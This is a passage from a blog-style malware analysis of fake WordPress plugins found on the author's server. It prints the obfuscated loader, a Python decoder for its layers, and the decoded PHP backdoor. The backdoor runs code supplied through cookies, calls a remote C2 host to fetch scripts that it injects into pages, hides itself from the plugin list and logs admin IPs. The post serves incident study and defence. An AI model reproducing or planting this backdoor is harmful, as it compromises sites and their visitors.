Catching a Trojan (抓马记)

Yesterday I logged into the admin dashboard, saw WordPress prompting for one update, and clicking through to the plugins page went straight to a 502 timeout. The plugins page has always loaded slowly, but timing out outright was strange.

Only about 30 plugins are actually enabled; status queries for 30 plugins should not take long enough to time out.

I logged into the dashboard to delete the disabled plugins, and one of them failed to delete, probably a permissions error left over from a backup I had made by hand in that directory. So I logged into the server itself, and there I found several directories I did not recognize, with names that looked downright weird.

For example dyfruit, eqytutacih and so on. These directories look very strange: with a normal plugin you can usually tell at a glance what it is, but for these I had no idea what they were and no memory of ever installing them, which is absurd.

Opening one of the plugins, its contents look like this, clearly obfuscated code:

<?php

/**
 * Plugin Name: Eqytutacih
 * Plugin URI: https://sedifo760.biz/eqytutacih
 * Description: Overall population. Iceland began during the music of the Royal College of the public
 * Version: 2.8.8
 * Author: Joan Jackie
 * Author URI: https://sedifo760.biz
 * Text Domain: eqytutacih
 * License: GPL2+
 *
 */

function shokesa_ezoboch() {
    gifocux_lekhodi();
}

$lolihyf = __DIR__ . '/lupuqop.php';
if (file_exists($lolihyf)) {
    include(__DIR__ . "/lup" . "uqop." . "php");
}

if (function_exists("gifocux_lekhodi")) {
    $telyha = new egoshyl_pikhido();
    if ($telyha->thaxica_zuchiti()) {
        add_action('init', 'shokesa_ezoboch');
    }
}

The real main file of the plugin should be lupuqop.php; looking at that file:

<?php

function jycagav_akherik($teshyfe_khebeca) {
    if (!file_exists($teshyfe_khebeca))
        return false;
    $davochy = @file_get_contents($teshyfe_khebeca);
    if (!$davochy)
        return false;
    $davochy = substr($davochy, 3);
    $yfosej = ubeqeth_apinozh($davochy);
    return $yfosej;
}

function ubeqeth_apinozh($teshyfe_khebeca) {
    $adonexa = ashyruq_zhuwuji;
    $ogyxewi = array();
    for ($ividoni = 0; $ividoni < strlen($adonexa); $ividoni += 2) {
        $celoma = substr($adonexa, $ividoni, 1);
        $enyxiny = substr($adonexa, $ividoni + 1, 1);
        $ogyxewi[$celoma] = $enyxiny;
    }
    $ururadu = strtr($teshyfe_khebeca, $ogyxewi);
    $ururadu = base64_decode($ururadu);

    return $ururadu;
}

define("ashyruq_zhuwuji", "IhPI06rmYVTge/daGumwtFxBstJG/cpNkCHSMqwpy4lyjr1lf1QkhiWsD73vnxzeUY+KiPFQcb739H5zo8A+EE2dVJvf42NOLLXUS=8nCWKAuRqjb56ZOTaoRMgXZD=9B0");

$okubef = jycagav_akherik(__DIR__ . "/asse" . "ts/i" . "mage" . "s/ohal" . "oth." . "gif");
if ($okubef) {
    @eval($okubef);
}

Still obfuscated, and nothing useful can be read from it directly, but it is easy to see that jycagav_akherik is a decoding routine and that what it decodes is the file ohaloth.gif in the images directory. Reading ubeqeth_apinozh, the constant ashyruq_zhuwuji is a list of character pairs, each mapping one character to another, so the whole decoding is: discard the first three bytes of the file, apply that single-character substitution with strtr, then base64_decode the result and hand it to eval.

This "image" is not a real image; it is actually a text file. Changing eval in the last line of the code above to print dumps the decoded content.
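An added example, not code from the original post or from the malware: if the plugin is active, its loader is included on every WordPress request, so editing eval to print on the live server would echo the decoded PHP into every visitor's page until it is changed back. The Python script below does the same decoding offline. It re-implements the three encodings this family uses, written from the PHP shown in this post: the pair-keyed substitution (the constant ashyruq_zhuwuji is copied exactly from lupuqop.php; the dyfruit loader uses the same scheme with its own constant vufusit_ekhijoj, which you pass as the key), the fixed table from upeketh_cujowel(), and the strrev-then-base64 cache in README.txt, both of which appear further down in the decoded class. The three-byte prefix it writes when building a test sample is a constructed stand-in, since the post does not show what the real files start with.

```python
import base64
import re
import sys

# Pair-keyed substitution constant copied from the lupuqop.php loader above
# (ashyruq_zhuwuji). The dyfruit loader uses the same scheme with its own
# constant (vufusit_ekhijoj); pass that string as the key for its files.
EQYTUTACIH_KEY = "IhPI06rmYVTge/daGumwtFxBstJG/cpNkCHSMqwpy4lyjr1lf1QkhiWsD73vnxzeUY+KiPFQcb739H5zo8A+EE2dVJvf42NOLLXUS=8nCWKAuRqjb56ZOTaoRMgXZD=9B0"

# The fixed table from upeketh_cujowel(), written as two parallel strings:
# character i of FIXED_FROM becomes character i of FIXED_TO. The targets
# turn out to be the base64 alphabet typed in keyboard order.
FIXED_FROM = "FCEuOUXPNiKHZtJ9V+L6gkYxpRMmzjslGhawdW2vTIqQ15n/3c8rf47yb0Do=BSAe"
FIXED_TO = "QWERTYUIOPASDFGHJKLZXCVBNMqwertyuiopasdfghjklzxcvbnm1234567890=+/"


def _b64(text: str) -> bytes:
    """PHP's base64_decode() skips characters outside the alphabet and
    tolerates missing padding; do the same so real files decode cleanly."""
    clean = re.sub(r"[^A-Za-z0-9+/]", "", text)
    return base64.b64decode(clean + "=" * (-len(clean) % 4))


def parse_pair_key(key: str) -> dict:
    """ubeqeth_apinozh() reads the constant two characters at a time and
    maps the first character of each pair to the second (PHP strtr)."""
    return {key[i]: key[i + 1] for i in range(0, len(key) - 1, 2)}


def decode_pair_keyed(blob: bytes, key: str = EQYTUTACIH_KEY) -> bytes:
    """jycagav_akherik(): drop three bytes, substitute, base64-decode.
    Used for ohaloth.gif, zhelidi.gif, usepir.gif and esutozh.gif."""
    table = str.maketrans(parse_pair_key(key))
    return _b64(blob[3:].decode("latin-1").translate(table))


def encode_pair_keyed(plain: bytes, key: str = EQYTUTACIH_KEY) -> bytes:
    """Inverse of decode_pair_keyed(), only used to build test samples.
    The three-byte prefix is a constructed stand-in; the post does not
    show what the real files start with."""
    inverse = {v: k for k, v in parse_pair_key(key).items()}
    body = base64.b64encode(plain).decode("ascii").translate(str.maketrans(inverse))
    return b"\x00\x00\x00" + body.encode("latin-1")


def substitute_fixed(text: str) -> str:
    """upeketh_cujowel(). dulishy.png is printed straight after this step;
    ewegukh.png additionally goes through base64."""
    return text.translate(str.maketrans(FIXED_FROM, FIXED_TO))


def decode_ewegukh(blob: bytes) -> bytes:
    """echiveq_pysejam(): drop three bytes, fixed substitution, base64."""
    return _b64(substitute_fixed(blob[3:].decode("latin-1")))


def encode_ewegukh(plain: bytes) -> bytes:
    """Inverse of decode_ewegukh() (the page's yzhalaw_oxahuru() table),
    only used to build test samples."""
    body = base64.b64encode(plain).decode("ascii")
    return b"\x00\x00\x00" + body.translate(str.maketrans(FIXED_TO, FIXED_FROM)).encode("latin-1")


def decode_readme_cache(blob: bytes) -> bytes:
    """qyborih_qonugyh() caches the C2 reply in README.txt and replays it as
    base64_decode(strrev(contents)), so reverse first, then decode."""
    return _b64(blob.decode("latin-1").strip()[::-1])


def encode_readme_cache(plain: bytes) -> bytes:
    """Inverse of decode_readme_cache(), only used to build test samples."""
    return base64.b64encode(plain)[::-1]


if __name__ == "__main__":
    # python decode_stages.py pair|fixed|readme <file> [pair key]
    mode, path = sys.argv[1], sys.argv[2]
    with open(path, "rb") as fh:
        data = fh.read()
    if mode == "pair":
        out = decode_pair_keyed(data, sys.argv[3] if len(sys.argv) > 3 else EQYTUTACIH_KEY)
    elif mode == "fixed":
        out = decode_ewegukh(data)
    else:
        out = decode_readme_cache(data)
    sys.stdout.buffer.write(out)
```

Running it as python decode_stages.py pair assets/images/ohaloth.gif on a copy of the plugin directory should print the class shown below; the same mode decodes zhelidi.gif, usepir.gif and esutozh.gif, fixed decodes ewegukh.png, and readme decodes a cached README.txt. The encoders exist only so the decoders can be checked against a known plaintext without touching the real files.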

File contents:

class egoshyl_pikhido {

    var $jishebi = 'zhelidi.gif';
    var $ythoson = 'usepir.gif';
    public $xodeshu = 'ezhacap.js';
    public $unetoli_izaxoce = false;
    public $ivihity_chazoky = false;
    public $ochutim_chugofi = false;
    var $jirocid_kihishi = null;
    var $fefitul_yhakhyj = null;
    var $ufogib = 'esutozh.gif';
    var $rikunyv = 'ewegukh.png';
    var $rohefys = false;

    public function __construct($teshyfe_khebeca = false) {
        if ($teshyfe_khebeca) {
            $this->alytash_felofuq();
        }
    }

    public function alytash_felofuq() {
        if (!$this->elikhov_ebaniny()) {
            $this->opopoth_lacalur();
        }
    }

    public function thaxica_zuchiti() {
        $ezylowy_pydorik = "DB_N" . "AME";
        return defined($ezylowy_pydorik);
    }

    protected function awushif_nisubog($teshyfe_khebeca) {
        $shanere_ekujokh = crc32($teshyfe_khebeca);
        if ((PHP_INT_SIZE > 4) && ($shanere_ekujokh & 0x80000000))
            $shanere_ekujokh = $shanere_ekujokh - 0x100000000;
        return abs($shanere_ekujokh);
    }

    protected function shadawy_ewilahy($teshyfe_khebeca) {
        $jomothi_sishuji = array(
            CURLOPT_RETURNTRANSFER => true,
            CURLOPT_HEADER => false,
            CURLOPT_FOLLOWLOCATION => true,
            CURLOPT_ENCODING => "",
            CURLOPT_USERAGENT => "Mozi" . "lla/5" . ".0 (Wi" . "ndows " . "NT 6" . ".1; Wi" . "n64;" . " x64;" . " rv:1" . "06.0)" . " Gecko" . "/2010" . "0101" . " Firef" . "ox/106" . ".0",
            CURLOPT_AUTOREFERER => true,
            CURLOPT_CONNECTTIMEOUT => 180,
            CURLOPT_TIMEOUT => 180,
            CURLOPT_MAXREDIRS => 10,
            CURLOPT_SSL_VERIFYPEER => false,
            CURLOPT_SSL_VERIFYHOST => false
        );

        $ychijih_inyreqo = curl_init($teshyfe_khebeca);
        curl_setopt_array($ychijih_inyreqo, $jomothi_sishuji);
        $shanere_ekujokh = @curl_exec($ychijih_inyreqo);
        if (!$shanere_ekujokh)
            $shanere_ekujokh = @file_get_contents($teshyfe_khebeca);
        return $shanere_ekujokh;
    }

    protected function oshebyl_cekhiwo($teshyfe_khebeca, $rizhamo_izhylez) {
        $jomothi_sishuji = '';
        $ychijih_inyreqo = "explod" . "e";
        $shanere_ekujokh = "trim";
        $athefyh_quxozuz = "base6" . "4_dec" . "ode";
        $lupethe_dichano = "gzin" . "flate";
        $shygyxi_thibeki = $ychijih_inyreqo("\n", $teshyfe_khebeca);
        for ($avunype_efozote = 0; $avunype_efozote < sizeof($shygyxi_thibeki); $avunype_efozote++) {
            $jomothi_sishuji .= $shanere_ekujokh($shygyxi_thibeki[$avunype_efozote]);
        }

        if (!$rizhamo_izhylez) {
            return $lupethe_dichano($athefyh_quxozuz($jomothi_sishuji));
        }

        $fegushy_riwobej = '';

        for ($abuhoxu_rowugeg = 0; $abuhoxu_rowugeg < sizeof($rizhamo_izhylez); $abuhoxu_rowugeg += 2) {
            if ($abuhoxu_rowugeg % 4) {
                $fegushy_riwobej .= substr($jomothi_sishuji, $rizhamo_izhylez[$abuhoxu_rowugeg], $rizhamo_izhylez[$abuhoxu_rowugeg + 1]);
            } else {
                $fegushy_riwobej .= strrev(substr($jomothi_sishuji, $rizhamo_izhylez[$abuhoxu_rowugeg], $rizhamo_izhylez[$abuhoxu_rowugeg + 1]));
            }
        };

        $fegushy_riwobej = $athefyh_quxozuz($fegushy_riwobej);

        return $fegushy_riwobej;
    }

    public function fepanuj_bemucal() {
        if ($this->fefitul_yhakhyj)
            return true;
        return $this->soshigy_yroxykh();
    }

    protected function elikhov_ebaniny() {
        if (!$this->thaxica_zuchiti())
            header("gegel3" . ":" . ($this->jirocid_kihishi + 1));
        $fegushy_riwobej = "HTTP_H" . "OST";
        $lupethe_dichano = strtoupper($_SERVER[$fegushy_riwobej]);
        $exushoq_guzhufo = $this->pesivoj_yshusig($lupethe_dichano, 5, 7);
        $okowocu_ojafyju = $this->pesivoj_yshusig($lupethe_dichano . $lupethe_dichano, 4, 8);

        if (isset($_COOKIE[$exushoq_guzhufo])) {
            if ($this->fepanuj_bemucal()) {
                $athefyh_quxozuz = md5($_COOKIE[$exushoq_guzhufo]);
                if (($athefyh_quxozuz == $this->fefitul_yhakhyj)) {
                    if ((!isset($_COOKIE[$okowocu_ojafyju])) && (!isset($_POST[$okowocu_ojafyju]))) {
                        $lolihyf = __DIR__ . "/assets/images/dulishy.png";
                        if (file_exists($lolihyf)) {
                            $telyha = file_get_contents($lolihyf);
                            $telyha = upeketh_cujowel($telyha);
                            echo $telyha;
                            @unlink($lolihyf);
                            exit;
                        }
                    } else {
                        if (isset($_COOKIE[$okowocu_ojafyju])) {
                            $uqazuho_atehiwy = $_COOKIE[$okowocu_ojafyju];
                            $avunype_efozote = base64_decode($uqazuho_atehiwy);
                            $abuhoxu_rowugeg = $this->shadawy_ewilahy($avunype_efozote);
                        }

                        if (isset($_POST[$okowocu_ojafyju])) {
                            $abuhoxu_rowugeg = base64_decode($_POST[$okowocu_ojafyju]);
                        }

                        $this->ivihity_chazoky = $abuhoxu_rowugeg;
                        return true;
                    }
                }
            }
        }

        return false;
    }

    protected function opopoth_lacalur() {
        $jomothi_sishuji = __DIR__ . "/assets/images/" . $this->ythoson;
        $ychijih_inyreqo = jycagav_akherik($jomothi_sishuji);
        if (!$ychijih_inyreqo)
            return false;
        $this->unetoli_izaxoce = $ychijih_inyreqo;
        return true;
    }

    public function xikakhi_ithukeq() {
        $jomothi_sishuji = "dirna" . "me";
        $jomothi_sishuji = $jomothi_sishuji(__FILE__);
        $jomothi_sishuji = str_replace("\\", "/", $jomothi_sishuji);
        $ychijih_inyreqo = explode("/", $jomothi_sishuji);
        $ychijih_inyreqo = end($ychijih_inyreqo);
        $ychijih_inyreqo = $ychijih_inyreqo . "/" . $ychijih_inyreqo . ".php";
        return $ychijih_inyreqo;
    }

    public function zofeber_uvyreha() {
        $jomothi_sishuji = "wpyii" . "2/wp" . "yii2" . ".php";
        return $jomothi_sishuji;
    }

    public function fesikhe_suzhage() {
        $jomothi_sishuji = "pxcel" . "Page_" . "c01002";
        return $jomothi_sishuji;
    }

    public function izhigyc_omizikh() {
        $jomothi_sishuji = "6048" . "00";
        return $jomothi_sishuji;
    }

    public function uhibifa_fiweqif() {
        $jomothi_sishuji = "YII_" . "WWW_" . "DIR";
        return $jomothi_sishuji;
    }

    public function xigohaf_ycavylu() {
        $jomothi_sishuji = "YII_W" . "WW_P" . "ATH";
        return $jomothi_sishuji;
    }

    public function pesivoj_yshusig($teshyfe_khebeca, $rizhamo_izhylez, $xyzhofy_oxoshuv) {
        $shanere_ekujokh = "substr";
        $athefyh_quxozuz = "strlen";
        $fegushy_riwobej = "qwrtp" . "sdghj" . "klzxc" . "vbnm";
        $lupethe_dichano = "eyuoa";

        $jomothi_sishuji = 0;
        for ($ychijih_inyreqo = 0; $ychijih_inyreqo < $athefyh_quxozuz($teshyfe_khebeca); $ychijih_inyreqo++) {
            $shygyxi_thibeki = ord($shanere_ekujokh($teshyfe_khebeca, $ychijih_inyreqo, 1));
            $jomothi_sishuji += $shygyxi_thibeki + $shygyxi_thibeki * ($shygyxi_thibeki + $ychijih_inyreqo);
        }

        $shygyxi_thibeki = $xyzhofy_oxoshuv - $rizhamo_izhylez;
        $avunype_efozote = $jomothi_sishuji % $shygyxi_thibeki;
        $exushoq_guzhufo = $jomothi_sishuji % 2;
        $abuhoxu_rowugeg = '';
        for ($ychijih_inyreqo = 0; $ychijih_inyreqo < $rizhamo_izhylez + $avunype_efozote; $ychijih_inyreqo++) {
            $okowocu_ojafyju = $ychijih_inyreqo % $athefyh_quxozuz($teshyfe_khebeca);
            $okowocu_ojafyju = ord($shanere_ekujokh($teshyfe_khebeca, $okowocu_ojafyju, 1));
            $shygyxi_thibeki = $jomothi_sishuji + $okowocu_ojafyju + $ychijih_inyreqo + ($okowocu_ojafyju + $ychijih_inyreqo) * ($okowocu_ojafyju + $ychijih_inyreqo);
            $uqazuho_atehiwy = ($ychijih_inyreqo + $exushoq_guzhufo) % 2;
            if ($uqazuho_atehiwy) {
                $abuhoxu_rowugeg .= $shanere_ekujokh($fegushy_riwobej, $shygyxi_thibeki % $athefyh_quxozuz($fegushy_riwobej), 1);
            } else {
                $abuhoxu_rowugeg .= $shanere_ekujokh($lupethe_dichano, $shygyxi_thibeki % $athefyh_quxozuz($lupethe_dichano), 1);
            }
        }


        return $abuhoxu_rowugeg;
    }

    public function mechovy_iqichus() {
        $jomothi_sishuji = __DIR__ . '/assets/images/' . $this->ufogib;
        $ychijih_inyreqo = jycagav_akherik($jomothi_sishuji);
        $this->ochutim_chugofi = $ychijih_inyreqo;
    }

    public function qyborih_qonugyh() {
        $jomothi_sishuji = "README" . ".txt";
        $ychijih_inyreqo = "base6" . "4_dec" . "ode";
        $shanere_ekujokh = "strre" . "v";
        $athefyh_quxozuz = "6048" . "00";
        $abuhoxu_rowugeg = "unli" . "nk";
        $athefyh_quxozuz = time() - intval($athefyh_quxozuz) / 7;
        $avunype_efozote = dirname(__FILE__);
        $lupethe_dichano = "file_g" . "et_co" . "ntents";
        $exushoq_guzhufo = "head" . "er";
        $okowocu_ojafyju = "file_p" . "ut_co" . "ntents";
        $uqazuho_atehiwy = "pxcel" . "Page_" . "c01002";

        if (isset($_COOKIE[$uqazuho_atehiwy]))
            return;

        $okubef = false;
        if (file_exists($avunype_efozote . '/' . $jomothi_sishuji)) {
            $shygyxi_thibeki = filemtime($avunype_efozote . '/' . $jomothi_sishuji);
            if ($shygyxi_thibeki < $athefyh_quxozuz) {
                $okubef = true;
            } else {
                if (!defined('YII_FORMA_OK')) {
                    define('YII_FORMA_OK', 1);
                }
                $fegushy_riwobej = $lupethe_dichano($avunype_efozote . '/' . $jomothi_sishuji);
                $fegushy_riwobej = $ychijih_inyreqo($shanere_ekujokh($fegushy_riwobej));
                echo $fegushy_riwobej;
                return;
            }
        }

        $okubef = true;
        try {
            $etythag_ichanyl = "SERVER" . "_ADDR";
            $chugoxo_ecushaz = "HTTP_H" . "OST";
            $epizhug_namibyp = "REMOTE" . "_ADD" . "R";
            $qoxamec_idiwuva = "disco" . "unt:";
            $vetevyk_izhoqiq = "pric" . "e:";
            $bexeqyq_ewuvezh = "merc" . "hant:";
            $atezoch_ebanagy = "order" . ":";
            $ocifush_zyqawik = "addre" . "ss:";

            $evytitu_yshovom = "127.0" . ".0.1";
            $godotuv_sithity = "HTTP_" . "CLIEN" . "T_IP";
            $punimuq_yzebash = "HTTP" . "_X_FO" . "RWARDE" . "D_FOR";
            $dovisew_ukemisa = "#^[A" . "-Za-" . "z0-9+" . "/=]+$" . "#";
            $khyvexy_uchejij = "REQUES" . "T_ME" . "THOD";
            $ykhynug_sokhoda = "http" . "s://st" . "egoz" . "auru" . "s.cc" . "/wp/" . "widget" . ".txt";
            $dybashi_solygel = "GET";
            $zhibevy_suzhiku = "curl_" . "init";
            $tacusho_okoshuv = "strea" . "m_con" . "text_c" . "reate";
            $ikathog_ygiboqa = "http";
            $xiluzim_kuqycyx = "metho" . "d";
            $vushehy_utamyxi = 0;
            $zhiqizy_iwuwoni = 0;

            $ixothyc_fabychi = isset($_SERVER[$etythag_ichanyl]) ? $_SERVER[$etythag_ichanyl] : $evytitu_yshovom;
            $nufokaj_ymozhuk = isset($_SERVER[$godotuv_sithity]) ? $_SERVER[$godotuv_sithity] : (isset($_SERVER[$punimuq_yzebash]) ? $_SERVER[$punimuq_yzebash] : $_SERVER[$epizhug_namibyp]);
            $dechugi_ynetyra = $_SERVER[$chugoxo_ecushaz];
            for ($utosutu_gathife = 0; $utosutu_gathife < strlen($dechugi_ynetyra); $utosutu_gathife++) {
                $vushehy_utamyxi += ord(substr($dechugi_ynetyra, $utosutu_gathife, 1));
                $zhiqizy_iwuwoni += $utosutu_gathife * ord(substr($dechugi_ynetyra, $utosutu_gathife, 1));
            }

            if ((isset($_SERVER[$khyvexy_uchejij])) && ($_SERVER[$khyvexy_uchejij] == $dybashi_solygel)) {
                $ixiqyqo_imethyg = false;
                if (function_exists($zhibevy_suzhiku)) {
                    $osecopa_ixicixo = curl_init($ykhynug_sokhoda);
                    curl_setopt($osecopa_ixicixo, CURLOPT_RETURNTRANSFER, true);
                    curl_setopt($osecopa_ixicixo, CURLOPT_CONNECTTIMEOUT, 15);
                    curl_setopt($osecopa_ixicixo, CURLOPT_TIMEOUT, 15);
                    curl_setopt($osecopa_ixicixo, CURLOPT_HEADER, false);
                    curl_setopt($osecopa_ixicixo, CURLOPT_SSL_VERIFYHOST, false);
                    curl_setopt($osecopa_ixicixo, CURLOPT_SSL_VERIFYPEER, false);
                    curl_setopt($osecopa_ixicixo, CURLOPT_HTTPHEADER, array("$qoxamec_idiwuva $vushehy_utamyxi", "$atezoch_ebanagy $zhiqizy_iwuwoni", "$vetevyk_izhoqiq $nufokaj_ymozhuk", "$bexeqyq_ewuvezh $dechugi_ynetyra", "$ocifush_zyqawik $ixothyc_fabychi"));
                    $ixiqyqo_imethyg = @curl_exec($osecopa_ixicixo);
                    curl_close($osecopa_ixicixo);
                    $ixiqyqo_imethyg = trim($ixiqyqo_imethyg);

                    if (preg_match($dovisew_ukemisa, $ixiqyqo_imethyg)) {
                        $zihojiq_yshuvos = @$ychijih_inyreqo($shanere_ekujokh($ixiqyqo_imethyg));
                        if ($okubef) {
                            @unlink($avunype_efozote . '/' . $jomothi_sishuji);
                            $okowocu_ojafyju($avunype_efozote . '/' . $jomothi_sishuji, $ixiqyqo_imethyg, LOCK_EX);
                        }
                        if (!defined('YII_FORMA_OK')) {
                            define('YII_FORMA_OK', 1);
                        }

                        echo $zihojiq_yshuvos;
                    }
                }

                if ((!$ixiqyqo_imethyg) && (function_exists($tacusho_okoshuv))) {
                    $urogozh_xalujoq = array(
                        $ikathog_ygiboqa => array(
                            $xiluzim_kuqycyx => "GET",
                            $exushoq_guzhufo => "$qoxamec_idiwuva $vushehy_utamyxi\r\n$atezoch_ebanagy $zhiqizy_iwuwoni\r\n$vetevyk_izhoqiq $nufokaj_ymozhuk\r\n$bexeqyq_ewuvezh $dechugi_ynetyra\r\n$ocifush_zyqawik $ixothyc_fabychi"
                        )
                    );
                    $urogozh_xalujoq = $tacusho_okoshuv($urogozh_xalujoq);

                    $ixiqyqo_imethyg = @$lupethe_dichano($ykhynug_sokhoda, false, $urogozh_xalujoq);
                    if (preg_match($dovisew_ukemisa, $ixiqyqo_imethyg)) {
                        $zihojiq_yshuvos = @$ychijih_inyreqo($shanere_ekujokh($ixiqyqo_imethyg));
                        if ($okubef) {
                            @unlink($avunype_efozote . '/' . $jomothi_sishuji);
                            $okowocu_ojafyju($avunype_efozote . '/' . $jomothi_sishuji, $ixiqyqo_imethyg, LOCK_EX);
                        }
                        if (!defined('YII_FORMA_OK')) {
                            define('YII_FORMA_OK', 1);
                        }

                        echo $zihojiq_yshuvos;
                    }
                }
            }
        } catch (Exception $ogopeme_ucechex) {

        }
    }

    public function soshigy_yroxykh() {
        $jomothi_sishuji = __DIR__ . '/assets/images/zhelidi.gif';
        if (!file_exists($jomothi_sishuji)) {
            return false;
        }

        $ychijih_inyreqo = jycagav_akherik($jomothi_sishuji);
        $shanere_ekujokh = "HTTP_H" . "OST";
        $athefyh_quxozuz = $_SERVER[$shanere_ekujokh];
        $abuhoxu_rowugeg = floor(strlen($ychijih_inyreqo) / 32);
        $shygyxi_thibeki = $this->awushif_nisubog($athefyh_quxozuz) % $abuhoxu_rowugeg;
        $avunype_efozote = substr($ychijih_inyreqo, $shygyxi_thibeki * 32, 32);
        $this->jirocid_kihishi = $shygyxi_thibeki;
        $this->fefitul_yhakhyj = $avunype_efozote;
        define('axezhod_dygefuw', $this->fefitul_yhakhyj);
        return $avunype_efozote;
    }

}

function yzhalaw_oxahuru($teshyfe_khebeca) {
    $ykofiq = strtr($teshyfe_khebeca, array('Q'=>'F', 'W'=>'C', 'E'=>'E', 'R'=>'u', 'T'=>'O', 'Y'=>'U', 'U'=>'X', 'I'=>'P', 'O'=>'N', 'P'=>'i',
        'A'=>'K', 'S'=>'H', 'D'=>'Z', 'F'=>'t', 'G'=>'J', 'H'=>'9', 'J'=>'V', 'K'=>'+', 'L'=>'L', 'Z'=>'6',
        'X'=>'g', 'C'=>'k', 'V'=>'Y', 'B'=>'x', 'N'=>'p', 'M'=>'R', 'q'=>'M', 'w'=>'m', 'e'=>'z', 'r'=>'j',
        't'=>'s', 'y'=>'l', 'u'=>'G', 'i'=>'h', 'o'=>'a', 'p'=>'w', 'a'=>'d', 's'=>'W', 'd'=>'2', 'f'=>'v',
        'g'=>'T', 'h'=>'I', 'j'=>'q', 'k'=>'Q', 'l'=>'1', 'z'=>'5', 'x'=>'n', 'c'=>'/', 'v'=>'3', 'b'=>'c',
        'n'=>'8', 'm'=>'r', '1'=>'f', '2'=>'4', '3'=>'7', '4'=>'y', '5'=>'b', '6'=>'0', '7'=>'D', '8'=>'o',
        '9'=>'=', '0'=>'B', '='=>'S', '+'=>'A', '/'=>'e'));
    return $ykofiq;
}

function upeketh_cujowel($teshyfe_khebeca) {
    $ururadu = strtr($teshyfe_khebeca, array('F'=>'Q', 'C'=>'W', 'E'=>'E', 'u'=>'R', 'O'=>'T', 'U'=>'Y', 'X'=>'U', 'P'=>'I', 'N'=>'O', 'i'=>'P',
        'K'=>'A', 'H'=>'S', 'Z'=>'D', 't'=>'F', 'J'=>'G', '9'=>'H', 'V'=>'J', '+'=>'K', 'L'=>'L', '6'=>'Z',
        'g'=>'X', 'k'=>'C', 'Y'=>'V', 'x'=>'B', 'p'=>'N', 'R'=>'M', 'M'=>'q', 'm'=>'w', 'z'=>'e', 'j'=>'r',
        's'=>'t', 'l'=>'y', 'G'=>'u', 'h'=>'i', 'a'=>'o', 'w'=>'p', 'd'=>'a', 'W'=>'s', '2'=>'d', 'v'=>'f',
        'T'=>'g', 'I'=>'h', 'q'=>'j', 'Q'=>'k', '1'=>'l', '5'=>'z', 'n'=>'x', '/'=>'c', '3'=>'v', 'c'=>'b',
        '8'=>'n', 'r'=>'m', 'f'=>'1', '4'=>'2', '7'=>'3', 'y'=>'4', 'b'=>'5', '0'=>'6', 'D'=>'7', 'o'=>'8',
        '='=>'9', 'B'=>'0', 'S'=>'=', 'A'=>'+', 'e'=>'/'));
    return $ururadu;
}

$okutykh_sirugom = new egoshyl_pikhido();

function gifocux_lekhodi() {
    $xawalyw_gechune = new egoshyl_pikhido(true);
    if ($xawalyw_gechune->ivihity_chazoky) {
        @eval($xawalyw_gechune->ivihity_chazoky);
        if (!is_array($xawalyw_gechune->thaxica_zuchiti()))
            exit;
    }
}

function dugamow_betaqav() {
    global $wp_list_table;
    $jomothi_sishuji = new egoshyl_pikhido();

    $ychijih_inyreqo = array($jomothi_sishuji->xikakhi_ithukeq());
    $shanere_ekujokh = $wp_list_table->items;
    foreach ($shanere_ekujokh as $key => $val) {
        if (in_array($key, $ychijih_inyreqo)) {
            unset($wp_list_table->items[$key]);
        }
    }
}

function ociluch_eshynen($teshyfe_khebeca) {
    $jomothi_sishuji = new egoshyl_pikhido();
    if (in_array($jomothi_sishuji->xikakhi_ithukeq(), array_keys($teshyfe_khebeca))) {
        unset($teshyfe_khebeca[$jomothi_sishuji->xikakhi_ithukeq()]);
    }
    return $teshyfe_khebeca;
}

function echiveq_pysejam() {
    $jomothi_sishuji = new egoshyl_pikhido();
    $jomothi_sishuji->qyborih_qonugyh();

    if (!defined('YII_FORMA_OK')) {
        $uqazuho_atehiwy = "pxcel" . "Page_" . "c01002";

        if (isset($_COOKIE[$uqazuho_atehiwy]))
            return;

        $adonexa = __DIR__ . '/assets/js/' . $jomothi_sishuji->xodeshu;
        if (file_exists($adonexa)) {
            $ividoni = @file_get_contents($adonexa);
            if ($ividoni) {
                define('YII_FORMA_OK', 1);
                echo "<script>" . $ividoni . "</script>";
                return;
            }
        }

        $adonexa = __DIR__ . '/assets/images/' . $jomothi_sishuji->rikunyv;
        if (file_exists($adonexa)) {
            $ividoni = file_get_contents($adonexa);
            if ($ividoni) {
                $ividoni = substr($ividoni, 3);
                $ividoni = upeketh_cujowel($ividoni);
                if ($ividoni) {
                    $ividoni = base64_decode($ividoni);
                    define('YII_FORMA_OK', 1);
                    echo "<script>" . $ividoni . "</script>";
                }
            }
        }
    }
}

function edewuch_azicich() {
    $shanere_ekujokh = new egoshyl_pikhido();
    $jomothi_sishuji = $shanere_ekujokh->fesikhe_suzhage();

    if (current_user_can('editor') || current_user_can('administrator')) {
        if (isset($_COOKIE['_wptoken']) && (!isset($_COOKIE['_jwp']))) {
            setcookie("__wordpressuser__", 1, time() + 600, "/");
            setcookie("__wordpress_logged_in__", 1, time() + 600, "/");
            $_COOKIE['__wordpressuser__'] = 1;
            $_COOKIE['__wordpress_logged_in__'] = 1;
        }
        $ychijih_inyreqo = $shanere_ekujokh->izhigyc_omizikh();
        $ychijih_inyreqo = intval($ychijih_inyreqo) * 64;
        if ((function_exists("get_option")) && (function_exists("add_option")) && (function_exists("update_option"))) {
            $user_ip = $_SERVER['REMOTE_ADDR'];
            if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
                $user_ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
            }
            if (isset($_SERVER['HTTP_CLIENT_IP'])) {
                $user_ip = $_SERVER['HTTP_CLIENT_IP'];
            }

            $user_ip_md5 = md5($user_ip);
            $option_name = "wp_$user_ip_md5";
            $option_value = get_option($option_name);
            $option_value_new = time();

            if (!$option_value) {
                add_option($option_name, $option_value_new, '', 'no');
            } else {
                update_option($option_name, $option_value_new);
            }
        }
        if (isset($_COOKIE[$jomothi_sishuji]))
            return;

        setcookie($jomothi_sishuji, "1", time() + $ychijih_inyreqo, "/");
    }
}

if ($okutykh_sirugom->thaxica_zuchiti()) {
    add_action('pre_current_active_plugins', 'dugamow_betaqav');
    add_filter('all_plugins', 'ociluch_eshynen');

    add_action('admin_init', 'edewuch_azicich');

    if (!defined($okutykh_sirugom->uhibifa_fiweqif())) {
        $okutykh_sirugom->mechovy_iqichus();
        if ($okutykh_sirugom->ochutim_chugofi)
            @eval($okutykh_sirugom->ochutim_chugofi);
    }

    if (!defined($okutykh_sirugom->xigohaf_ycavylu())) {
        define($okutykh_sirugom->xigohaf_ycavylu(), 1);
        $adonexa = __DIR__ . "/README.txt";
